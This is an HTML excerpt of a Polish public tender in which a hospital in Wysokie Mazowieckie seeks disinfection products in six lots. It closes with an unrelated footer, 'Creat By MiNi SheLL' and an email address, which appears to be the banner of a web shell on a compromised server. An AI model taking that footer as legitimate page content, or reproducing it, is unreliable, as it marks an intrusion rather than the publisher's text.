<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 10:00, miejsce: Szpital Ogólny , ul. Szpitalna 5 , 18 - 200 Wysokie Mazowieckie - pokój 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dezynfekcja narzędzi chirurgicznych , endoskopów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dezynfekcja powierzchni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maszynowe mycie i dezynfekcja endoskopów i sprzętu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mycie i dezynfekcja skóry , błon śluzowych i rąk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maszynowe mycie i dezynfekcja narzędzi i sprzętu medycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do odtłuszczania skóry pacjenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com